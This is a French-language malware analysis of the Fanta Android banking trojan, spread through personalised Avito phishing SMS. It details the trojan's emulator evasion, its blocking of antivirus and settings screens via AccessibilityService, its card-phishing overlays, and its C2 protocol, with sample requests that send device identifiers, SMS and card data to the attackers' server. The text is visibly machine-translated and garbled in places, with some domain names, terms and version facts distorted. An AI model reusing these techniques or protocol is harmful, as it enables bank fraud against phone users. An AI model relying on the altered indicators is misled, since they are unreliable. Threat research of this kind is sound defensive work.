Un jour, vous souhaitez vendre quelque chose sur Avito et, après avoir posté une description détaillée de votre produit (par exemple, un module RAM), vous recevrez ce message :
Une fois que vous ouvrez le lien, vous verrez une page apparemment anodine vous informant, le vendeur heureux et prospère, qu'un achat a été effectué :
Une fois que vous avez cliqué sur le bouton « Continuer », un fichier APK avec une icône et un nom inspirant la confiance sera téléchargé sur votre appareil Android. Vous avez installé une application qui, pour une raison quelconque, demandait les droits AccessibilityService, puis quelques fenêtres sont apparues et ont rapidement disparu et... C'est tout.
Vous allez vérifier votre solde, mais pour une raison quelconque, votre application bancaire vous demande à nouveau les détails de votre carte. Après avoir saisi les données, quelque chose de terrible se produit : pour une raison encore incompréhensible pour vous, l'argent commence à disparaître de votre compte. Vous essayez de résoudre le problème, mais votre téléphone résiste : il appuie sur les touches « Retour » et « Accueil », ne s'éteint pas et ne vous permet d'activer aucune mesure de sécurité. En conséquence, vous vous retrouvez sans argent, vos biens n'ont pas été achetés, vous êtes confus et vous vous demandez : que s'est-il passé ?
La réponse est simple : vous êtes victime du cheval de Troie Android Fanta, membre de la famille Flexnet. Comment est-ce arrivé? Expliquons maintenant.
Auteurs: Andreï Polovinkine, spécialiste junior de l'analyse des malwares, Ivan Pisarev, spécialiste de l'analyse des malwares.
Quelques statistiques
La famille Flexnet de chevaux de Troie Android a été connue pour la première fois en 2015. Au cours d'une période d'activité assez longue, la famille s'est élargie à plusieurs sous-espèces : Fanta, Limebot, Lipton, etc. Le cheval de Troie, ainsi que l'infrastructure qui lui est associée, ne restent pas immobiles : de nouveaux schémas de distribution efficaces sont en cours de développement - dans notre cas, des pages de phishing de haute qualité destinées à un utilisateur-vendeur spécifique, et les développeurs de chevaux de Troie suivent les tendances à la mode dans écriture de virus - ajout de nouvelles fonctionnalités permettant de voler plus efficacement de l'argent sur les appareils infectés et de contourner les mécanismes de protection.
La campagne décrite dans cet article s'adresse aux utilisateurs russes : un petit nombre d'appareils infectés ont été enregistrés en Ukraine, et encore moins au Kazakhstan et en Biélorussie.
Même si Flexnet est présent dans le domaine des chevaux de Troie Android depuis plus de 4 ans et a été étudié en détail par de nombreux chercheurs, il est toujours en bon état. Depuis janvier 2019, le montant potentiel des dommages s'élève à plus de 35 millions de roubles - et cela ne concerne que les campagnes en Russie. En 2015, différentes versions de ce cheval de Troie Android ont été vendues sur des forums clandestins, où l'on pouvait également trouver le code source du cheval de Troie avec une description détaillée. Cela signifie que les statistiques des dégâts dans le monde sont encore plus impressionnantes. Ce n’est pas un mauvais indicateur pour un si vieil homme, n’est-ce pas ?
De la vente à la tromperie
Comme le montre la capture d'écran présentée précédemment d'une page de phishing pour le service Internet de publication d'annonces Avito, elle a été préparée pour une victime spécifique. Apparemment, les attaquants utilisent l’un des analyseurs Avito, qui extrait le numéro de téléphone et le nom du vendeur, ainsi que la description du produit. Après avoir développé la page et préparé le fichier APK, la victime reçoit un SMS avec son nom et un lien vers une page de phishing contenant une description de son produit et le montant reçu de la « vente » du produit. En cliquant sur le bouton, l'utilisateur reçoit un fichier APK malveillant - Fanta.
Une étude du domaine shcet491[.]ru a montré qu'il est délégué aux serveurs DNS d'Hostinger :
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Le fichier de zone de domaine contient des entrées pointant vers les adresses IP 31.220.23[.]236, 31.220.23[.]243 et 31.220.23[.]235. Cependant, l'enregistrement de ressource principale du domaine (enregistrement A) pointe vers un serveur avec l'adresse IP 178.132.1[.]240.
L'adresse IP 178.132.1[.]240 est située aux Pays-Bas et appartient à l'hébergeur Flux mondial. Les adresses IP 31.220.23[.]235, 31.220.23[.]236 et 31.220.23[.]243 sont situées au Royaume-Uni et appartiennent au serveur d'hébergement mutualisé HOSTINGER. Utilisé comme enregistreur openprov-ru. Les domaines suivants ont également été résolus avec l'adresse IP 178.132.1[.]240 :
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Il convient de noter que les liens au format suivant étaient disponibles dans presque tous les domaines :
http://(www.){0,1}<%domain%>/[0-9]{7}
Ce modèle comprend également un lien provenant d'un message SMS. Sur la base de données historiques, il a été constaté qu'un domaine correspond à plusieurs liens selon le modèle décrit ci-dessus, ce qui indique qu'un domaine a été utilisé pour distribuer le cheval de Troie à plusieurs victimes.
Allons de l'avant : le cheval de Troie téléchargé via un lien depuis un SMS utilise l'adresse comme serveur de contrôle onusedseddohap[.]club. Ce domaine a été enregistré le 2019/03/12 et à partir du 2019/04/29, les applications APK ont interagi avec ce domaine. Sur la base des données obtenues de VirusTotal, un total de 109 applications ont interagi avec ce serveur. Le domaine lui-même résolu en adresse IP 217.23.14[.]27, situé aux Pays-Bas et appartenant à l'hébergeur Flux mondial. Utilisé comme enregistreur NameCheap. Domaines également résolus vers cette adresse IP mauvais-racoon[.]club (à partir du 2018-09-25) et mauvais-racoon[.]vivre (à partir du 2018-10-25). Avec domaine mauvais-racoon[.]club plus de 80 fichiers APK interagis avec mauvais-racoon[.]vivre - plus de 100.
En général, l'attaque se déroule comme suit :
Qu'y a-t-il sous le couvercle de Fanta ?
Comme beaucoup d'autres chevaux de Troie Android, Fanta est capable de lire et d'envoyer des messages SMS, d'effectuer des requêtes USSD et d'afficher ses propres fenêtres au-dessus des applications (y compris bancaires). Cependant, l'arsenal de fonctionnalités de cette famille est arrivé : Fanta a commencé à utiliser AccessibilitéService à diverses fins : lire le contenu des notifications d'autres applications, empêcher la détection et arrêter l'exécution d'un cheval de Troie sur un appareil infecté, etc. Fanta fonctionne sur toutes les versions d'Android inférieures à 4.4. Dans cet article, nous examinerons de plus près l'exemple Fanta suivant :
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Immédiatement après le lancement
Immédiatement après son lancement, le cheval de Troie cache son icône. L'application ne peut fonctionner que si le nom de l'appareil infecté ne figure pas dans la liste :
- android_x86
- VirtualBox
- Nexus 5X (barbotte)
- Nexus 5 (rasoir)
Ce contrôle est effectué dans le service principal du cheval de Troie - Service principal. Lors du premier lancement, les paramètres de configuration de l'application sont initialisés aux valeurs par défaut (le format de stockage des données de configuration et leur signification seront discutés plus loin) et un nouvel appareil infecté est enregistré sur le serveur de contrôle. Une requête HTTP POST avec le type de message sera envoyée au serveur registre_bot et des informations sur l'appareil infecté (version Android, IMEI, numéro de téléphone, nom de l'opérateur et code du pays dans lequel l'opérateur est enregistré). L'adresse sert de serveur de contrôle hXXp://onuseseddohap[.]club/controller.php. En réponse, le serveur envoie un message contenant les champs bot_id, bot_pwd, serveur — l'application enregistre ces valeurs en tant que paramètres du serveur CnC. Paramètre serveur facultatif si le champ n'a pas été reçu : Fanta utilise l'adresse d'enregistrement - hXXp://onuseseddohap[.]club/controller.php. La fonction de changement d'adresse CnC peut être utilisée pour résoudre deux problèmes : répartir la charge uniformément entre plusieurs serveurs (s'il y a un grand nombre d'appareils infectés, la charge sur un serveur web non optimisé peut être élevée), et aussi utiliser un serveur alternatif en cas de panne d'un des serveurs CnC.
Si une erreur se produit lors de l'envoi de la demande, le cheval de Troie répétera le processus d'enregistrement après 20 secondes.
Une fois l'appareil enregistré avec succès, Fanta affichera le message suivant à l'utilisateur :
Remarque importante : le service appelé Sécurité du système — le nom du service cheval de Troie, et après avoir cliqué sur le bouton OK Une fenêtre s'ouvrira avec les paramètres d'accessibilité de l'appareil infecté, dans laquelle l'utilisateur devra accorder des droits d'accessibilité pour le service malveillant :
Dès que l'utilisateur allume AccessibilitéService, Fanta accède au contenu des fenêtres de l'application et aux actions qui y sont effectuées :
Immédiatement après avoir reçu les droits d'accessibilité, le cheval de Troie demande les droits d'administrateur et les droits de lecture des notifications :
Grâce à AccessibilityService, l'application simule les frappes au clavier, se donnant ainsi tous les droits nécessaires.
Fanta crée plusieurs instances de base de données (qui seront décrites plus tard) nécessaires pour stocker les données de configuration, ainsi que les informations collectées au cours du processus sur l'appareil infecté. Pour envoyer les informations collectées, le cheval de Troie crée une tâche répétitive conçue pour télécharger des champs de la base de données et recevoir une commande du serveur de contrôle. L'intervalle d'accès à CnC est paramétré en fonction de la version d'Android : dans le cas de la 5.1, l'intervalle sera de 10 secondes, sinon de 60 secondes.
Pour recevoir la commande, Fanta fait une demande ObtenirTâche au serveur de gestion. En réponse, CnC peut envoyer l'une des commandes suivantes :
| Équipe | description |
|---|---|
| 0 | Envoyer un message SMS |
| 1 | Passer un appel téléphonique ou une commande USSD |
| 2 | Met à jour un paramètre intervalle |
| 3 | Met à jour un paramètre intercepter |
| 6 | Met à jour un paramètre Gestionnaire de SMS |
| 9 | Commencez à collecter des messages SMS |
| 11 | Réinitialisez votre téléphone aux paramètres d'usine |
| 12 | Activer/Désactiver la journalisation de la création de la boîte de dialogue |
Fanta collecte également les notifications de 70 applications bancaires, systèmes de paiement rapide et portefeuilles électroniques et les stocke dans une base de données.
Stockage des paramètres de configuration
Pour stocker les paramètres de configuration, Fanta utilise une approche standard pour la plateforme Android : Préférences-des dossiers. Les paramètres seront enregistrés dans un fichier nommé Paramétres. Une description des paramètres enregistrés se trouve dans le tableau ci-dessous.
| Prénom | Valeur par défaut | Valeurs possibles | description |
|---|---|---|---|
| id | 0 | Entier | ID du robot |
| serveur | hXXp://onuseseddohap[.]club/ | URL | Adresse du serveur de contrôle |
| pwd | - | Chaîne | Mot de passe du serveur |
| intervalle | 20 | Entier | Intervalle de temps. Indique combien de temps les tâches suivantes doivent être différées :
|
| intercepter | TOUTE | tout/numéro de téléphone | Si le champ est égal à la chaîne TOUTE ou numéro de téléphone, le message SMS reçu sera intercepté par l'application et ne sera pas affiché à l'utilisateur |
| Gestionnaire de SMS | 0 | 0/1 | Activer/désactiver l'application comme destinataire SMS par défaut |
| lireDialogue | non | Vrai faux | Activer/Désactiver la journalisation des événements AccessibilitéÉvénement |
Fanta utilise également le fichier Gestionnaire de SMS:
| Prénom | Valeur par défaut | Valeurs possibles | description |
|---|---|---|---|
| paquet | - | Chaîne | Nom du gestionnaire de messages SMS utilisé |
Interaction avec les bases de données
Lors de son fonctionnement, le cheval de Troie utilise deux bases de données. Base de données nommée a utilisé pour stocker diverses informations collectées à partir du téléphone. La deuxième base de données est nommée fanta.db et est utilisé pour enregistrer les paramètres responsables de la création de fenêtres de phishing conçues pour collecter des informations sur les cartes bancaires.
Le cheval de Troie utilise une base de données а pour stocker les informations collectées et enregistrer vos actions. Les données sont stockées dans une table journaux. Pour créer une table, utilisez la requête SQL suivante :
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)La base de données contient les informations suivantes :
1. Enregistrer le démarrage de l'appareil infecté avec un message Le téléphone s'est allumé !
2. Notifications des applications. Le message est généré selon le modèle suivant :
(<%App Name%>)<%Title%>: <%Notification text%>
3. Données de carte bancaire issues de formulaires de phishing créés par le cheval de Troie. Paramètre VIEW_NAME peut être l'un des éléments suivants :
- AliExpress
- Avito
- Google Play
- Divers <%App Name%>
Le message est enregistré au format :
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Messages SMS entrants/sortants au format :
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informations sur le package qui crée la boîte de dialogue au format :
(<%Package name%>)<%Package information%>
Exemple de tableau journaux:
L'une des fonctionnalités de Fanta est la collecte d'informations sur les cartes bancaires. La collecte de données s'effectue via la création de fenêtres de phishing lors de l'ouverture d'applications bancaires. Le cheval de Troie crée la fenêtre de phishing une seule fois. Les informations selon lesquelles la fenêtre a été affichée à l'utilisateur sont stockées dans un tableau Paramétres dans la base de données fanta.db. Pour créer une base de données, utilisez la requête SQL suivante :
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Tous les champs du tableau Paramétres par défaut initialisé à 1 (créer une fenêtre de phishing). Une fois que l'utilisateur a saisi ses données, la valeur sera définie sur 0. Exemple de champs de tableau Paramétres:
- can_login — le champ se charge d'afficher le formulaire lors de l'ouverture d'une application bancaire
- première_banque - non utilisé
- can_avito — le champ se charge d'afficher le formulaire lors de l'ouverture de l'application Avito
- can_ali — le champ se charge d'afficher le formulaire lors de l'ouverture de l'application Aliexpress
- can_un autre — le champ se charge d'afficher le formulaire lors de l'ouverture d'une application de la liste : Yula, Pandao, Drom Auto, Portefeuille. Cartes de réduction et de bonus, Aviasales, Booking, Trivago
- carte_can — le champ se charge d'afficher le formulaire à l'ouverture Google Play
Interaction avec le serveur de gestion
L'interaction réseau avec le serveur de gestion s'effectue via le protocole HTTP. Pour travailler avec le réseau, Fanta utilise la populaire bibliothèque Retrofit. Les demandes sont envoyées à : hXXp://onuseseddohap[.]club/controller.php. L'adresse du serveur peut être modifiée lors de l'inscription sur le serveur. Des cookies peuvent être envoyés en réponse depuis le serveur. Fanta fait les requêtes suivantes au serveur :
- L'enregistrement du bot sur le serveur de contrôle s'effectue une seule fois, lors du premier lancement. Les données suivantes sur l'appareil infecté sont envoyées au serveur :
· Cookies — cookies reçus du serveur (la valeur par défaut est une chaîne vide)
· mode — constante de chaîne registre_bot
· préfixe — constante entière 2
· version_sdk — est constitué selon le modèle suivant : <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· Imei — IMEI de l'appareil infecté
· Pays — code du pays dans lequel l'opérateur est enregistré, au format ISO
· nombre - numéro de téléphone
· opérateur - nom de l'opérateurUn exemple de requête envoyée au serveur :
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>En réponse à la requête, le serveur doit renvoyer un objet JSON contenant les paramètres suivants :
· bot_id — ID de l'appareil infecté. Si bot_id est égal à 0, Fanta réexécutera la requête.
bot_pwd — mot de passe pour le serveur.
serveur — adresse du serveur de contrôle. Paramètre facultatif. Si le paramètre n'est pas précisé, l'adresse enregistrée dans l'application sera utilisée.Exemple d'objet JSON :
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Demande de recevoir une commande du serveur. Les données suivantes sont envoyées au serveur :
· Cookies — cookies reçus du serveur
· offre — identifiant de l'appareil infecté reçu lors de l'envoi de la demande registre_bot
· pwd —mot de passe du serveur
· division_admin — le champ détermine si les droits d'administrateur ont été obtenus. Si les droits d'administrateur ont été obtenus, le champ est égal à 1sinon 0
· Accessibilité — État de fonctionnement du service d'accessibilité. Si le service a été démarré, la valeur est 1sinon 0
· Gestionnaire de SMS — indique si le cheval de Troie est activé comme application par défaut pour recevoir des SMS
· écran - affiche l'état dans lequel se trouve l'écran. La valeur sera définie 1, si l'écran est allumé, sinon 0;Un exemple de requête envoyée au serveur :
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Selon la commande, le serveur peut renvoyer un objet JSON avec différents paramètres :
· Équipe Envoyer un message SMS: Les paramètres contiennent le numéro de téléphone, le texte du message SMS et l'ID du message envoyé. L'identifiant est utilisé lors de l'envoi d'un message au serveur de type définirSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Équipe Passer un appel téléphonique ou une commande USSD: Le numéro de téléphone ou la commande apparaît dans le corps de la réponse.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Équipe Modifier le paramètre d'intervalle.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Équipe Modifier le paramètre d'interception.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Équipe Modifier le champ SmsManager.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Équipe Collecter les messages SMS d'un appareil infecté.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Équipe Réinitialisez votre téléphone aux paramètres d'usine:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Équipe Modifier le paramètre ReadDialog.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Envoi d'un message avec type définirSmsStatus. Cette demande est faite après l'exécution de la commande Envoyer un message SMS. La requête ressemble à ceci :
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Téléchargement du contenu de la base de données. Une ligne est transmise par requête. Les données suivantes sont envoyées au serveur :
· Cookies — cookies reçus du serveur
· mode — constante de chaîne setSaveInboxSms
· offre — identifiant de l'appareil infecté reçu lors de l'envoi de la demande registre_bot
· texte — texte dans l'enregistrement actuel de la base de données (champ d de la table journaux dans la base de données а)
· nombre — nom de l'enregistrement actuel de la base de données (champ p de la table journaux dans la base de données а)
· mode_sms — valeur entière (champ m de la table journaux dans la base de données а)La requête ressemble à ceci :
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Si elle est envoyée avec succès au serveur, la ligne sera supprimée du tableau. Exemple d'objet JSON renvoyé par le serveur :
{ "response":[], "status":"ok" }
Interagir avec AccessibilityService
AccessibilityService a été mis en œuvre pour rendre les appareils Android plus faciles à utiliser pour les personnes handicapées. Dans la plupart des cas, une interaction physique est nécessaire pour interagir avec une application. AccessibilityService vous permet de les faire par programme. Fanta utilise le service pour créer de fausses fenêtres dans les applications bancaires et empêcher les utilisateurs d'ouvrir les paramètres du système et certaines applications.
Grâce à la fonctionnalité AccessibilityService, le cheval de Troie surveille les modifications apportées aux éléments sur l'écran de l'appareil infecté. Comme décrit précédemment, les paramètres Fanta contiennent un paramètre responsable des opérations de journalisation avec des boîtes de dialogue - lireDialogue. Si ce paramètre est défini, les informations sur le nom et la description du package qui a déclenché l'événement seront ajoutées à la base de données. Le cheval de Troie effectue les actions suivantes lorsque des événements sont déclenchés :
- Simule l'appui sur les touches retour et accueil dans les cas suivants :
· si l'utilisateur souhaite redémarrer son appareil
· si l'utilisateur souhaite supprimer l'application « Avito » ou modifier les droits d'accès
· s'il y a une mention de l'application « Avito » sur la page
· lors de l'ouverture de l'application Google Play Protect
· lors de l'ouverture de pages avec les paramètres AccessibilityService
· lorsque la boîte de dialogue Sécurité du système apparaît
· lors de l'ouverture de la page avec les paramètres « Dessiner sur une autre application »
· lors de l'ouverture de la page « Applications », « Récupération et réinitialisation », « Réinitialisation des données », « Réinitialiser les paramètres », « Panneau développeur », « Spécial. opportunités », « Opportunités spéciales », « Droits spéciaux »
· si l'événement a été généré par certaines applications.Liste des candidatures
- android
- Maître Lite
- Clean Master
- Clean Master pour CPU x86
- Gestion des autorisations des applications Meizu
- MIUI Sécurité
- Clean Master - Antivirus, cache et nettoyeur de déchets
- Contrôle parental et GPS : Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Bêta
- Nettoyeur de virus, antivirus, nettoyeur (MAX Security)
- Sécurité antivirus mobile PRO
- Antivirus Avast et protection gratuite 2019
- Sécurité mobile MegaFon
- Protection AVG pour Xperia
- Sécurité mobile
- Antivirus et protection Malwarebytes
- Antivirus pour Android 2019
- Maître de sécurité - Antivirus, VPN, AppLock, Booster
- Antivirus AVG pour tablette Huawei System Manager
- Accessibilité Samsung
- Gestionnaire intelligent de Samsung
- Maître de sécurité
- Accélérateur
- Dr.Web
- Dr.Web Security Space
- Centre de Contrôle Dr.Web Mobile
- Vie de l'espace de sécurité Dr.Web
- Centre de Contrôle Dr.Web Mobile
- Antivirus et sécurité mobile
- Kaspersky Internet Security : antivirus et protection
- Autonomie de la batterie de Kaspersky : économiseur et booster
- Kaspersky Endpoint Security - protection et gestion
- AVG Antivirus gratuit 2019 – Protection pour Android
- antivirus Android
- Norton Mobile Security et Antivirus
- Antivirus, pare-feu, VPN, sécurité mobile
- Sécurité mobile : antivirus, VPN, protection contre le vol
- Antivirus pour Android
- Si l'autorisation est demandée lors de l'envoi d'un message SMS à un numéro court, Fanta simule un clic sur la case à cocher Rappelez-vous le choix et bouton envoyer.
- Lorsque vous essayez de retirer les droits d'administrateur du cheval de Troie, celui-ci verrouille l'écran du téléphone.
- Empêche l'ajout de nouveaux administrateurs.
- Si l'application antivirus dr.web a détecté une menace, Fanta imite en appuyant sur le bouton ignorer.
- Le cheval de Troie simule l'appui sur les boutons retour et accueil si l'événement a été généré par l'application Entretien des appareils Samsung.
- Fanta crée des fenêtres de phishing avec des formulaires permettant de saisir des informations sur les cartes bancaires si une application d'une liste d'environ 30 services Internet différents était lancée. Parmi eux : AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Formulaires de phishing
Fanta analyse quelles applications sont en cours d'exécution sur l'appareil infecté. Si une application intéressante a été ouverte, le cheval de Troie affiche par-dessus toutes les autres une fenêtre de phishing, qui est un formulaire de saisie des informations de carte bancaire. L'utilisateur doit saisir les données suivantes :
- Numéro de carte
- Date d'expiration de la carte
- CVV
- Nom du titulaire de la carte (pas pour toutes les banques)
Selon l'application en cours d'exécution, différentes fenêtres de phishing s'afficheront. Vous trouverez ci-dessous des exemples de certains d'entre eux :
Aliexpress :
Avito :
Pour certaines autres applications, par ex. Google Play Market, Aviasales, Pandao, Booking, Trivago :
Comment c'était vraiment
Heureusement, la personne qui a reçu le SMS décrit au début de l’article s’est avérée être un spécialiste de la cybersécurité. Par conséquent, la version réelle, non-directrice, diffère de celle racontée précédemment : une personne a reçu un SMS intéressant, après quoi il l'a transmis à l'équipe de renseignement sur la chasse aux menaces du Group-IB. Le résultat de l’attaque est cet article. Une fin heureuse, non ? Cependant, toutes les histoires ne se terminent pas avec autant de succès, et pour que la vôtre ne ressemble pas à un film de réalisateur avec perte d'argent, il suffit dans la plupart des cas de respecter les règles suivantes décrites en détail :
- n'installez pas d'applications pour un appareil mobile doté du système d'exploitation Android à partir d'une source autre que Google Play
- Lors de l'installation d'une application, portez une attention particulière aux droits demandés par l'application
- faites attention aux extensions des fichiers téléchargés
- installer régulièrement les mises à jour du système d'exploitation Android
- ne visitez pas les ressources suspectes et ne téléchargez pas de fichiers à partir de là
- Ne cliquez pas sur les liens reçus dans les messages SMS.
Source: habr.com